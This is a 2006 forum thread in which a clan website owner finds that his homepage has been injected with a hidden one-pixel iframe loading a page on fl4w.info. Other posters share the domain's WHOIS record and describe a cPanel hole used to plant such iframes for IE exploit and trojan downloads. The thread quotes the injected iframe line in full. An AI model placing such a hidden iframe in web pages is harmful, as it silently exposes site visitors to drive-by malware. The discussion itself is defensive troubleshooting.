Has my website been hacked?

.Griff. · 28 Sep 2006 at 22:00

Just returned from my holiday to be told by a few of my clan members that Websense was stopping them from viewing our site at work and a few other members were reporting that their AV's were triggered when viewing our site.

When I got back I checked the site and nothing appeared out of the ordinary..

Until I spotted this -

Website as it appears normally in Firefox:

However when I highlight the top left hand corner an "invisible" link appears:

Source code now contains this aswell:

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<iframe src="http://fl4w.info/jusse/index.php" frameborder="0" width="1" height="1" scrolling="no"></iframe><head>
http://fl4w.info/jusse/index.php<head>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>Welcome to Chaos Theory Clan</title>
<style type="text/css">

</style></head>

Any idea A, What the hell this is and B, How it got there?

bitslice · 28 Sep 2006 at 22:11

pwned by ruskies

Domain Name: FL4W.INFO
Created On: 10-Feb-2006 17: 40: 30 UTC
Last Updated On: 31-Jul-2006 19: 57: 31 UTC
Expiration Date: 10-Feb-2007 17: 40: 30 UTC
Sponsoring Registrar: Direct Information Pvt. Ltd. d/b/a PublicDomainRegistry.com (R159-LRMS)
Status: OK
Registrant ID: DI_2383217
Registrant Name: Vladimir a Shulepov
Registrant Organization: whitehat
Registrant Street1: Leningradskya 1
Registrant Street2:
Registrant Street3:
Registrant City: Svertlovo
Registrant State/Province: Leningradskaya oblast
Registrant Postal Code: 200310
Registrant Country: RU
Registrant Phone: 7.812300500
Registrant Phone Ext.:
Registrant FAX:
Registrant FAX Ext.:
Registrant Email: [email protected]

--------------------

see here:
http://forum.catalyst2.com/showthread.php?p=16632

they did it here too:
http://www.bsalsa.com/

All sites listed here are either linked to sites that run exploits,
http://webhelper4u.net/whmembers/siteslists/cwsalphaA.txt
such as FL4W.INFO apparently

looks like it's been known about for a while.

so, yeh, if they can write to your front page, you have a flaw.
...got any logs left ?

.

.Griff. · 28 Sep 2006 at 22:12

Interesting but doesn't really help me..

Edit - Cheers for the edit. I'd stumbled across that earlier when I googled it but none of it really made any sense.

I'll get access to the logs tomorrow but that page is literally a gif image (montage of clan pics) and a simple "enter" button. Nothing else.

Beansprout · 28 Sep 2006 at 23:30

Due to the sensitive nature of recent exploits I haven't actually seen examples in the wild or indeed found much detail, however the last I heard there is an exploit going around which is placing iframe code on sites which will download a trojan to take advantage of a recently-discovered hole in IE (the one MS released the early patch for due to the mounting scale of attacks - this one)) and generally do not-very-nice things.

IF this is caused by what I think it is (and I believe it is, looking at its style), then the server which hosts your account has probably been rooted (or at least affected by the recent exploit) and you should call up your hosting company IMMEDIATELY. There has been an attack going round whereby someone gains access to a cPanel server (as a standard user, say by purchasing a hosting account) and then exploiting the hole in cPanel to write this iframe crap into people's websites. Not good.

There is a patch here, although upcp should also have picked it up by now.

At least one very large cPanel-based host was rather badly affected. cPanel released patches but it's believed the hole was known about and being used for weeks beforehand.

It seems too much of a coincidence to not be this, imo, though I don't wish to scaremonger

zain · 29 Sep 2006 at 01:00

"Registrant Organization: whitehat "

That pretty much tells you, though I see no point in hacking such a website!

Beansprout · 29 Sep 2006 at 01:02

zain said:
That pretty much tells you, though I see no point in hacking such a website!

Root server > add trojan downloading code to hundreds of sites > reproduce on thousands of servers > get trojan installed on thousands of PCs > make a fortune in the ad revenue.

All comes down to greed

.Griff. · 29 Sep 2006 at 09:51

Thanks for the added information.

I'll update you later today when I find out more today.